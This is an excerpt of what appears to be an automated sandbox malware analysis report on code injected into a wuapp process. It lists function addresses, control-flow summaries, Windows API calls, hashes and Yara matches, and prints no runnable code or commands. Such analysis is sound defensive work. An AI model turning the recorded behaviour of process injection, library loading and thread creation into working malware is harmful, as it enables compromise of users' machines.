                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9FB50 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                        • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                        • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                        • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9FAB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                        • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                        • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                        • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00128FF0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 300 128ff0-129032 call 12be20 303 129038-129088 call 12bef0 call 11a0e0 call 125a40 300->303 304 12910c-129112 300->304 312 129090-1290a1 Sleep 303->312 313 1290a3-1290a9 312->313 314 129106-12910a 312->314 315 1290d3-1290f4 call 128e20 313->315 316 1290ab-1290d1 call 128c20 313->316 314->304 314->312 320 1290f9-1290fc 315->320 316->320 320->314
                                                        APIs
                                                        • Sleep.KERNELBASE(000007D0), ref: 00129098
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: net.dll$wininet.dll
                                                        • API String ID: 3472027048-1269752229
                                                        • Opcode ID: 435d5b72a1cbef6549f2c0d885b1f2f7dec4cc8403c773cfc9aa7e74d2998e0e
                                                        • Instruction ID: b6f15609c9afcf28beaec656b7120ed86709098451c8e63a3bd9031df59ab28e
                                                        • Opcode Fuzzy Hash: 435d5b72a1cbef6549f2c0d885b1f2f7dec4cc8403c773cfc9aa7e74d2998e0e
                                                        • Instruction Fuzzy Hash: DF31AFB6602704ABD725DF69D8A1FA7B7B8FF48700F00811DFA1A9B281D731A555CBE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00128FE6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 321 128fe6-12901f 322 12902b-129032 321->322 323 129026 call 12be20 321->323 324 129038-129088 call 12bef0 call 11a0e0 call 125a40 322->324 325 12910c-129112 322->325 323->322 333 129090-1290a1 Sleep 324->333 334 1290a3-1290a9 333->334 335 129106-12910a 333->335 336 1290d3-1290f4 call 128e20 334->336 337 1290ab-1290d1 call 128c20 334->337 335->325 335->333 341 1290f9-1290fc 336->341 337->341 341->335
                                                        APIs
                                                        • Sleep.KERNELBASE(000007D0), ref: 00129098
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: net.dll$wininet.dll
                                                        • API String ID: 3472027048-1269752229
                                                        • Opcode ID: f67f2977435e73d15df1aeb201953e657b79fd99b1269b873f98a0ab67329ae0
                                                        • Instruction ID: 52de95da94e18399b7e5f73a1cdc2d49582522d944d7c36cab4332a74b47a4fb
                                                        • Opcode Fuzzy Hash: f67f2977435e73d15df1aeb201953e657b79fd99b1269b873f98a0ab67329ae0
                                                        • Instruction Fuzzy Hash: EB31E3B2601315ABD715DF68D891FABBBB4EF48700F10811DFA199B282D371A465CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 001175F3 Relevance: 3.1, APIs: 2, Instructions: 66threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 342 1175f3-1175f4 343 117634-11766c call 12bf40 call 12cb20 call 11a0e0 342->343 344 1175f6 342->344 346 11766d-11767a call 125a40 343->346 345 1175f8-117603 344->345 344->346 345->343 353 11767c-11768e PostThreadMessageW 346->353 354 1176ae-1176b2 346->354 355 117690-1176ab call 119840 PostThreadMessageW 353->355 356 1176ad 353->356 355->356 356->354
                                                        APIs
                                                        • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 0011768A
                                                        • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 001176AB
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: e8f10ab93e280f6c44fd0f173b9b351da9bb6be2d6eccab9178df92255b65650
                                                        • Instruction ID: 33b5d2a2806d6f6322fb794a313e641e4b97143cb726307463605b20e630ed8f
                                                        • Opcode Fuzzy Hash: e8f10ab93e280f6c44fd0f173b9b351da9bb6be2d6eccab9178df92255b65650
                                                        • Instruction Fuzzy Hash: C0012631A801287AE724A698DC43FFE7728EF54B51F044139FB04FA2C1E7A46D4687E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00117630 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 377 117630-11763f 378 117648-11767a call 12cb20 call 11a0e0 call 125a40 377->378 379 117643 call 12bf40 377->379 387 11767c-11768e PostThreadMessageW 378->387 388 1176ae-1176b2 378->388 379->378 389 117690-1176ab call 119840 PostThreadMessageW 387->389 390 1176ad 387->390 389->390 390->388
                                                        APIs
                                                        • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 0011768A
                                                        • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 001176AB
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 936f838c949d7ac0cd1410a4ea2eb09aa53af833da505c72487ee6613ac9fd53
                                                        • Instruction ID: 216dab69a109edcd564df7bcbb608a72884071bdb94dfc5816dd3b4ca2135f1c
                                                        • Opcode Fuzzy Hash: 936f838c949d7ac0cd1410a4ea2eb09aa53af833da505c72487ee6613ac9fd53
                                                        • Instruction Fuzzy Hash: 5401A231A802287BE724A6959C43FFE776C9F14B50F044128FF04BA1C1E7A4690687E6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00117629 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 361 117629-11763f 362 117648-11767a call 12cb20 call 11a0e0 call 125a40 361->362 363 117643 call 12bf40 361->363 371 11767c-11768e PostThreadMessageW 362->371 372 1176ae-1176b2 362->372 363->362 373 117690-1176ab call 119840 PostThreadMessageW 371->373 374 1176ad 371->374 373->374 374->372
                                                        APIs
                                                        • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 0011768A
                                                        • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 001176AB
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 3ce97a60d7b82ec3734065e22fa696d29ea73bdd6f64d2ef20b3ec9f9ab80729
                                                        • Instruction ID: 7daa64186901603dbf1dba4ec96a5cb6229d2d7eb194ad5ac550362d0a3467b8
                                                        • Opcode Fuzzy Hash: 3ce97a60d7b82ec3734065e22fa696d29ea73bdd6f64d2ef20b3ec9f9ab80729
                                                        • Instruction Fuzzy Hash: 73018431A806287BE735A6A49C43FFE7B2C9F55B50F144128FB04BA1C1E7A46A0687E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0012911A Relevance: 1.6, APIs: 1, Instructions: 110threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 588 12911a-12911b 589 12919a 588->589 590 12911d-12911e 588->590 593 1291b0-129279 call 12bec0 * 2 call 12c190 call 12bec0 call 12c190 call 12bec0 * 2 589->593 594 12919c-1291aa 589->594 591 129120-129148 call 125a40 590->591 592 12910f-129112 590->592 601 129167-12916c 591->601 602 12914a-129166 call 12f39f CreateThread 591->602 603 12928d-129290 593->603 617 12927b-129284 593->617 594->593 594->603 617->603 618 129286 617->618 618->603
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0011D290,?,?), ref: 0012915C
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: f16cc74794a770b92e1aa6bab936f624af8927e6ebb14edd164ca71e6778d891
                                                        • Instruction ID: 93ccb382b997a34f984dea87268ea82bfbd743ec8449e668f97dc4b1107ec708
                                                        • Opcode Fuzzy Hash: f16cc74794a770b92e1aa6bab936f624af8927e6ebb14edd164ca71e6778d891
                                                        • Instruction Fuzzy Hash: A431B276201715BBD314DB78ECE2FE7B3A8EF98740F004519F6199A181DB70B82987A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0011A0E0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 627 11a0e0-11a109 call 12cd70 630 11a10b-11a10e 627->630 631 11a10f-11a11d call 12d190 627->631 634 11a12d-11a13e call 12b4c0 631->634 635 11a11f-11a12a call 12d410 631->635 640 11a140-11a154 LdrLoadDll 634->640 641 11a157-11a15a 634->641 635->634 640->641
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0011A152
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 40796ed2abedf08632889fec39371184e398d1dfafb99c177ad60987c42a2680
                                                        • Instruction ID: 01ea53c551505d48e6ce3c6f7fd9feea2f987eb1129a23e52f09da96111709ef
                                                        • Opcode Fuzzy Hash: 40796ed2abedf08632889fec39371184e398d1dfafb99c177ad60987c42a2680
                                                        • Instruction Fuzzy Hash: E0011EB5E4020DBBDB14EAE4EC42FDDB7B89F54308F1041A5E90897241F731EB588B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0012A612 Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 643 12a612-12a61e 644 12a620-12a64c call 12af20 643->644 645 12a5ad-12a5b4 643->645 646 12a5bc-12a5d1 RtlAllocateHeap 645->646 647 12a5b7 call 12af20 645->647 647->646
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00125126,?,0012589F,0012589F,?,00125126,?,?,?,?,?,00000000,00000005,00000206), ref: 0012A5CD
